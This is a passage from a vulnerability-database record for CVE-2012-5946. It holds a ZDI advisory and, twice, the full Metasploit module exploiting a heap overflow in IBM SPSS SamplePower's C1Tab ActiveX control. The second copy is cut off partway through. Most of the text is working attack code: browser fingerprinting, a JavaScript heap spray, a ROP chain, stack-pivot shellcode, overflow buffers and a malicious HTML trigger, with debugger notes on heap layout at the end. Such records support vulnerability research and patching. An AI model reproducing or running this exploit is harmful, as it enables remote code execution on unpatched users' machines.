7 and 8 on Windows XP SP3 and IE 8 on Windows 7\r\n SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alexander Gavrun', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-5946' ],\r\n [ 'OSVDB', '92845' ],\r\n [ 'BID', '59559' ],\r\n [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21635476' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 991,\r\n 'BadChars' => \"\\x00\",\r\n 'DisableNops' => true\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # IBM SPSS SamplePower 3.0 / c1sizer.ocx 8.0.20071.39\r\n [ 'Automatic', {} ],\r\n [ 'IE 6 on Windows XP SP3',\r\n {\r\n 'Offset' => '0x5F4',\r\n 'Ret' => 0x0c0c0c08\r\n }\r\n ],\r\n [ 'IE 7 on Windows XP SP3',\r\n {\r\n 'Offset' => '0x5F4',\r\n 'Ret' => 0x0c0c0c08\r\n }\r\n ],\r\n [ 'IE 8 on Windows XP SP3',\r\n {\r\n 'Offset' => '0x5f4',\r\n 'Ret' => 0x0c0c0c0c,\r\n 'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret\r\n }\r\n ],\r\n [ 'IE 8 on Windows 7',\r\n {\r\n 'Offset' => '0x5f4',\r\n 'Ret' => 0x0c0c0c0c,\r\n 'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Apr 26 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n ie_name = \"IE #{ie}\"\r\n\r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n end\r\n\r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n print_status(\"target not found #{agent}\")\r\n return nil\r\n end\r\n\r\n def ie_heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n\r\n # Land the payload at 0x0c0c0c0c\r\n # For IE 6, 7, 8\r\n js = %Q|\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n var overflow = nops.substring(0, 10);\r\n |\r\n\r\n js = heaplib(js, {:noobfu => true})\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n return js\r\n end\r\n\r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"V\").first\r\n end\r\n\r\n def rop_chain\r\n # gadgets from c1sizer.ocx\r\n rop_gadgets =\r\n [\r\n 0x0c0c0c10,\r\n 0x10026984, # ADD ESP,10 # POP EDI # POP ESI # POP EBX # POP EBP # RETN # stackpivot to the controlled stack\r\n 0x100076f1, # pop eax # ret\r\n 0x10029134, # &VirtualAllox\r\n 0x1001b41e, # jmp [eax]\r\n 0x0c0c0c34, # ret address\r\n 0x0c0c0c0c, # lpAddress\r\n 0x00001000, # dwSize\r\n 0x00001000, # flAllocationType\r\n 0x00000040 # flProtect\r\n ].pack(\"V*\")\r\n\r\n return rop_gadgets\r\n end\r\n\r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n # No rop. Just return the payload.\r\n\r\n if (t.name =~ /IE 6/ or t.name =~ /IE 7/)\r\n fake_memory = [\r\n 0x0c0c0c10,\r\n 0x0c0c0c14\r\n ].pack(\"V*\")\r\n return fake_memory + code\r\n end\r\n\r\n return rop_chain + stack_pivot + code\r\n end\r\n\r\n # Objects filling aren't randomized because\r\n # this combination make exploit more reliable.\r\n def fake_object(size)\r\n object = \"B\" * 8 # metadata\r\n object << \"D\" * size # fake object\r\n return object\r\n end\r\n\r\n def stack_pivot\r\n pivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n pivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n pivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n return pivot\r\n end\r\n\r\n # Check the memory layout documentation at the end of the module\r\n def overflow_xp\r\n buf = rand_text_alpha(0x10000)\r\n # Start to overflow\r\n buf << fake_object(0x40)\r\n buf << fake_object(0x30)\r\n buf << fake_object(0x30)\r\n buf << fake_object(0x40)\r\n buf << fake_object(0x10)\r\n buf << fake_object(0x10)\r\n buf << fake_object(0x20)\r\n buf << fake_object(0x10)\r\n buf << fake_object(0x30)\r\n buf << \"B\" * 0x8 # metadata chunk\r\n buf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object\r\n end\r\n\r\n # Check the memory layout documentation at the end of the module\r\n def overflow_xp_ie8\r\n buf = [\r\n junk, # padding\r\n 0x1001b557, # pop eax # c1sizer.ocx\r\n 0x0c0c0c14, # eax\r\n 0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap\r\n ].pack(\"V*\")\r\n buf << rand_text_alpha(0x10000-16)\r\n # Start to overflow\r\n buf << \"B\" * 0x8 # metadata chunk\r\n buf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object\r\n end\r\n\r\n # Check the memory layout documentation at the end of the module\r\n def overflow_w7\r\n buf = [\r\n junk, # padding\r\n 0x1001b557, # pop eax # c1sizer.ocx\r\n 0x0c0c0c14, # eax\r\n 0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap\r\n ].pack(\"V*\")\r\n buf << rand_text_alpha(0x10000-16)\r\n # Start to oveflow\r\n buf << fake_object(0x3f8)\r\n buf << fake_object(0x1a0)\r\n buf << fake_object(0x1e0)\r\n buf << fake_object(0x1a0)\r\n buf << fake_object(0x1e0)\r\n buf << fake_object(0x1a0)\r\n buf << \"B\" * 0x8 # metadata chunk\r\n buf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object\r\n end\r\n\r\n def get_overflow(t)\r\n if t.name =~ /Windows 7/\r\n return overflow_w7\r\n elsif t.name =~ /Windows XP/ and t.name =~ /IE 8/\r\n return overflow_xp_ie8\r\n elsif t.name =~ /Windows XP/\r\n return overflow_xp\r\n end\r\n end\r\n\r\n # * 15 C1TAB objects are used to defragement the heap, so objects are stored after the vulnerable buffer.\r\n # * Based on empirical tests, 5th C1TAB comes after the vulnerable buffer.\r\n # * Using the 7th CITAB is possible to overflow itself and get control before finishing the set of the\r\n # TabCaption property.\r\n def trigger_w7\r\n target = rand_text_alpha(5 + rand(3))\r\n target2 = rand_text_alpha(5 + rand(3))\r\n target3 = rand_text_alpha(5 + rand(3))\r\n target4 = rand_text_alpha(5 + rand(3))\r\n target5 = rand_text_alpha(5 + rand(3))\r\n target6 = rand_text_alpha(5 + rand(3))\r\n target7 = rand_text_alpha(5 + rand(3))\r\n target8 = rand_text_alpha(5 + rand(3))\r\n target9 = rand_text_alpha(5 + rand(3))\r\n target10 = rand_text_alpha(5 + rand(3))\r\n target11 = rand_text_alpha(5 + rand(3))\r\n target12 = rand_text_alpha(5 + rand(3))\r\n target13 = rand_text_alpha(5 + rand(3))\r\n target14 = rand_text_alpha(5 + rand(3))\r\n target15 = rand_text_alpha(5 + rand(3))\r\n\r\n objects = %Q|\r\n <object id=\"#{target}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target2}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target3}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target4}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target5}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target6}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target7}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target8}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target9}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target10}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target11}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target12}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target13}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target14}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n <object id=\"#{target15}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n |\r\n return objects, target7\r\n end\r\n\r\n # * Based on empirical test, the C1TAB object comes after the vulnerable buffer on memory, so just\r\n # an object is sufficient to overflow itself and get control execution.\r\n def trigger_xp\r\n target = rand_text_alpha(5 + rand(3))\r\n\r\n objects = %Q|\r\n <object id=\"#{target}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object>\r\n |\r\n return objects, target\r\n end\r\n\r\n def get_trigger(t)\r\n if t.name =~ /Windows 7/\r\n return trigger_w7\r\n elsif t.name =~ /Windows XP/\r\n return trigger_xp\r\n end\r\n end\r\n\r\n def load_exploit_html(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = ie_heap_spray(my_target, p)\r\n buf = get_overflow(my_target)\r\n\r\n objects, target_object = get_trigger(my_target)\r\n\r\n html = %Q|\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n #{objects}\r\n <script>\r\n CollectGarbage();\r\n #{js}\r\n #{target_object}.Caption = \"\";\r\n #{target_object}.TabCaption(0) = \"#{buf}\";\r\n </script>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n\r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n\r\n[*] Windows XP / ie6 & ie7 memory layout at oveflow, based on empirical test\r\n\r\n Heap entries for Segment01 in Heap 01ca0000\r\n address: psize . size flags state (requested size)\r\n 025c0000: 00000 . 00040 [01] - busy (40)\r\n 025c0040: 00040 . 10008 [01] - busy (10000)\r\n 025d0048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer\r\n 025e0050: 10008 . 00048 [01] - busy (40)\r\n 025e0098: 00048 . 00038 [01] - busy (30)\r\n 025e00d0: 00038 . 00038 [01] - busy (30)\r\n 025e0108: 00038 . 00048 [01] - busy (40)\r\n 025e0150: 00048 . 00018 [01] - busy (10)\r\n 025e0168: 00018 . 00018 [01] - busy (10)\r\n 025e0180: 00018 . 00028 [01] - busy (20)\r\n 025e01a8: 00028 . 00018 [01] - busy (10)\r\n 025e01c0: 00018 . 00010 [00]\r\n 025e01d0: 00010 . 00038 [01] - busy (30)\r\n 025e0208: 00038 . 001e8 [01] - busy (1e0) // Vulnerable object\r\n 025e03f0: 001e8 . 001a8 [01] - busy (1a0)\r\n\r\n\r\n[*] Windows XP / ie8 memory layout at oveflow, based on empirical test\r\n\r\n Heap entries for Segment01 in Heap 03350000\r\n address: psize . size flags state (requested size)\r\n 03840000: 00000 . 00040 [01] - busy (40)\r\n 03840040: 00040 . 10008 [01] - busy (10000)\r\n 03850048: 10008 . 10008 [01] - busy (10000) // Overflowed buffer\r\n 03860050: 10008 . 001e8 [01] - busy (1e0) // Vulnerable object\r\n 03860238: 001e8 . 001a8 [01] - busy (1a0)\r\n 038603e0: 001a8 . 00078 [00]\r\n 03860458: 00078 . 00048 [01] - busy (40)\r\n 038604a0: 00048 . 00048 [01] - busy (40)\r\n 038604e8: 00048 . 00618 [01] - busy (610)\r\n 03860b00: 00618 . 10208 [01] - busy (10200)\r\n 03870d08: 10208 . 032f8 [10]\r\n 03874000: 000cc000 - uncommitted bytes.\r\n\r\n\r\n[*] windows 7 / ie8 memory layout at oveflow, based on empirical test\r\n\r\n 03240000: 00000 . 00040 [101] - busy (3f)\r\n 03240040: 00040 . 10008 [101] - busy (10000)\r\n 03250048: 10008 . 10008 [101] - busy (10000) # Overwritten buffer\r\n 03260050: 10008 . 00400 [101] - busy (3f8) Internal\r\n 03260450: 00400 . 001a8 [101] - busy (1a0)\r\n 032605f8: 001a8 . 001e8 [101] - busy (1e0)\r\n 032607e0: 001e8 . 001a8 [101] - busy (1a0)\r\n 03260988: 001a8 . 001e8 [101] - busy (1e0)\r\n 03260b70: 001e8 . 001a8 [101] - busy (1a0)\r\n 03260d18: 001a8 . 001e8 [101] - busy (1e0) # Our vulnerable object, target7, seems reliable according to testing\r\n 03260f00: 001e8 . 001a8 [101] - busy (1a0)\r\n 032610a8: 001a8 . 001e8 [101] - busy (1e0)\r\n 03261290: 001e8 . 001a8 [101] - busy (1a0)\r\n 03261438: 001a8 . 001e8 [101] - busy (1e0)\r\n 03261620: 001e8 . 001a8 [101] - busy (1a0)\r\n 032617c8: 001a8 . 001e8 [101] - busy (1e0)\r\n\r\n[*] Overflow:\r\n\r\n.text:100146E1 push eax ; lpString2\r\n.text:100146E2 push CaptionlpBuffer ; lpString1\r\n.text:100146E8 call ds:lstrcatA ; Heap Overflow when setting a new CaptionString > 0x10000\r\n\r\n[*] Get Control after overflow:\r\n\r\n.text:1001A40D call overflow_sub_1001469E ; Overflow happens here\r\n.text:1001A412 mov ecx, edi ; edi points to the overflowed object, then ecx (this)\r\n.text:1001A414 call get_control_sub_100189EC ; Get profit from the overflowed object here\r\n\r\n.text:100189EC get_control_sub_100189EC proc near ; CODE XREF: sub_1001A1A9+B6\u0019p\r\n.text:100189EC ; SetTabCaption_sub_1001A2EC+128\u0019p ...\r\n.text:100189EC\r\n.text:100189EC var_4 = dword ptr -4\r\n.text:100189EC\r\n.text:100189EC push ebp\r\n.text:100189ED mov ebp, esp\r\n.text:100189EF push ecx\r\n.text:100189F0 mov eax, [ecx+10h] # ecx points to controlled memory, so eax can be controlled\r\n.text:100189F3 and [ebp+var_4], 0\r\n.text:100189F7 test eax, eax\r\n.text:100189F9 jz short locret_10018A23\r\n.text:100189FB mov ecx, [eax] # eax can be controlled and make it point to sprayed mem, ecx can be controlled\r\n.text:100189FD lea edx, [ebp+var_4]\r\n.text:10018A00 push edx\r\n.text:10018A01 push offset unk_1002B628\r\n.text:10018A06 push eax\r\n.text:10018A07 call dword ptr [ecx] # woot!\r\n\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25814/"}], "zdi": [{"lastseen": "2020-06-22T11:41:21", "bulletinFamily": "info", "cvelist": ["CVE-2012-5946"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS SamplePower. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the C1sizer.ocx ActiveX Control. This component performs insufficient bounds checking on user-supplied data on the TabCaption property which results in memory corruption. An attacker can leverage this situation to execute code under the context of the user running the browser.", "modified": "2013-06-22T00:00:00", "published": "2013-05-29T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-100/", "id": "ZDI-13-100", "title": "IBM SPSS SamplePower C1sizer.ocx ActiveX TabCaption Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:54", "description": "", "published": "2013-05-28T00:00:00", "type": "packetstorm", "title": "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5946"], "modified": "2013-05-28T00:00:00", "id": "PACKETSTORM:121760", "href": "https://packetstormsecurity.com/files/121760/IBM-SPSS-SamplePower-C1Tab-ActiveX-Heap-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \ninclude Msf::Exploit::Remote::BrowserAutopwn \n \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"6.0\", \n:ua_maxver => \"8.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:rank => NormalRanking, \n:classid => \"{24E04EBF-014D-471F-930E-7654B1193BA9}\", \n:method => \"TabCaption\" \n}) \n \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow\", \n'Description' => %q{ \nThis module exploits a heap based buffer overflow in the C1Tab ActiveX control, \nwhile handling the TabCaption property. The affected control can be found in the \nc1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has \nbeen tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7 \nSP1. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Alexander Gavrun', # Vulnerability discovery \n'juan vazquez' # Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2012-5946' ], \n[ 'OSVDB', '92845' ], \n[ 'BID', '59559' ], \n[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21635476' ] \n], \n'Payload' => \n{ \n'Space' => 991, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# IBM SPSS SamplePower 3.0 / c1sizer.ocx 8.0.20071.39 \n[ 'Automatic', {} ], \n[ 'IE 6 on Windows XP SP3', \n{ \n'Offset' => '0x5F4', \n'Ret' => 0x0c0c0c08 \n} \n], \n[ 'IE 7 on Windows XP SP3', \n{ \n'Offset' => '0x5F4', \n'Ret' => 0x0c0c0c08 \n} \n], \n[ 'IE 8 on Windows XP SP3', \n{ \n'Offset' => '0x5f4', \n'Ret' => 0x0c0c0c0c, \n'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret \n} \n], \n[ 'IE 8 on Windows 7', \n{ \n'Offset' => '0x5f4', \n'Ret' => 0x0c0c0c0c, \n'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Apr 26 2013\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \nprint_status(\"target not found #{agent}\") \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch)) \n \n# Land the payload at 0x0c0c0c0c \n# For IE 6, 7, 8 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \nvar overflow = nops.substring(0, 10); \n| \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef junk(n=4) \nreturn rand_text_alpha(n).unpack(\"V\").first \nend \n \ndef rop_chain \n# gadgets from c1sizer.ocx \nrop_gadgets = \n[ \n0x0c0c0c10, \n0x10026984, # ADD ESP,10 # POP EDI # POP ESI # POP EBX # POP EBP # RETN # stackpivot to the controlled stack \n0x100076f1, # pop eax # ret \n0x10029134, # &VirtualAllox \n0x1001b41e, # jmp [eax] \n0x0c0c0c34, # ret address \n0x0c0c0c0c, # lpAddress \n0x00001000, # dwSize \n0x00001000, # flAllocationType \n0x00000040 # flProtect \n].pack(\"V*\") \n \nreturn rop_gadgets \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n# No rop. Just return the payload. \n \nif (t.name =~ /IE 6/ or t.name =~ /IE 7/) \nfake_memory = [ \n0x0c0c0c10, \n0x0c0c0c14 \n].pack(\"V*\") \nreturn fake_memory + code \nend \n \nreturn rop_chain + stack_pivot + code \nend \n \n# Objects filling aren't randomized because \n# this combination make exploit more reliable. \ndef fake_object(size) \nobject = \"B\" * 8 # metadata \nobject << \"D\" * size # fake object \nreturn object \nend \n \ndef stack_pivot \npivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb \npivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit \npivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit \npivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset \nreturn pivot \nend \n \n# Check the memory layout documentation at the end of the module \ndef overflow_xp \nbuf = rand_text_alpha(0x10000) \n# Start to overflow \nbuf << fake_object(0x40) \nbuf << fake_object(0x30) \nbuf << fake_object(0x30) \nbuf << fake_object(0x40) \nbuf << fake_object(0x10) \nbuf << fake_object(0x10) \nbuf << fake_object(0x20) \nbuf << fake_object(0x10) \nbuf << fake_object(0x30) \nbuf << \"B\" * 0x8 # metadata chunk \nbuf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object \nend \n \n# Check the memory layout documentation at the end of the module \ndef overflow_xp_ie8 \nbuf = [ \njunk, # padding \n0x1001b557, # pop eax # c1sizer.ocx \n0x0c0c0c14, # eax \n0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap \n].pack(\"V*\") \nbuf << rand_text_alpha(0x10000-16) \n# Start to overflow \nbuf << \"B\" * 0x8 # metadata chunk \nbuf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object \nend \n \n# Check the memory layout documentation at the end of the module \ndef overflow_w7 \nbuf = [ \njunk, # padding \n0x1001b557, # pop eax # c1sizer.ocx \n0x0c0c0c14, # eax \n0x10028ad8 # xchg eax,esp # c1sizer.ocx # stackpivot to the heap \n].pack(\"V*\") \nbuf << rand_text_alpha(0x10000-16) \n# Start to oveflow \nbuf << fake_object(0x3f8) \nbuf << fake_object(0x1a0) \nbuf << fake_object(0x1e0) \nbuf << fake_object(0x1a0) \nbuf << fake_object(0x1e0) \nbuf << fake_object(0x1a0) \nbuf << \"B\" * 0x8 # metadata chunk \nbuf << \"\\x0c\" * 0x40 # Overflow first 0x40 of the exploited object \nend \n \ndef get_overflow(t) \nif t.name =~ /Windows 7/ \nreturn overflow_w7 \nelsif t.name =~ /Windows XP/ and t.name =~ /IE 8/ \nreturn overflow_xp_ie8 \nelsif t.name =~ /Windows XP/ \nreturn overflow_xp \nend \nend \n \n# * 15 C1TAB objects are used to defragement the heap, so objects are stored after the vulnerable buffer. \n# * Based on empirical tests, 5th C1TAB comes after the vulnerable buffer. \n# * Using the 7th CITAB is possible to overflow itself and get control before finishing the set of the \n# TabCaption property. \ndef trigger_w7 \ntarget = rand_text_alpha(5 + rand(3)) \ntarget2 = rand_text_alpha(5 + rand(3)) \ntarget3 = rand_text_alpha(5 + rand(3)) \ntarget4 = rand_text_alpha(5 + rand(3)) \ntarget5 = rand_text_alpha(5 + rand(3)) \ntarget6 = rand_text_alpha(5 + rand(3)) \ntarget7 = rand_text_alpha(5 + rand(3)) \ntarget8 = rand_text_alpha(5 + rand(3)) \ntarget9 = rand_text_alpha(5 + rand(3)) \ntarget10 = rand_text_alpha(5 + rand(3)) \ntarget11 = rand_text_alpha(5 + rand(3)) \ntarget12 = rand_text_alpha(5 + rand(3)) \ntarget13 = rand_text_alpha(5 + rand(3)) \ntarget14 = rand_text_alpha(5 + rand(3)) \ntarget15 = rand_text_alpha(5 + rand(3)) \n \nobjects = %Q| \n<object id=\"#{target}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target2}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target3}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target4}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target5}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target6}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target7}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target8}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target9}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target10}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target11}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target12}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target13}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target14}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n<object id=\"#{target15}\" width=\"100%\" height=\"100%\" classid=\"clsid:24E04EBF-014D-471F-930E-7654B1193BA9\"></object> \n| 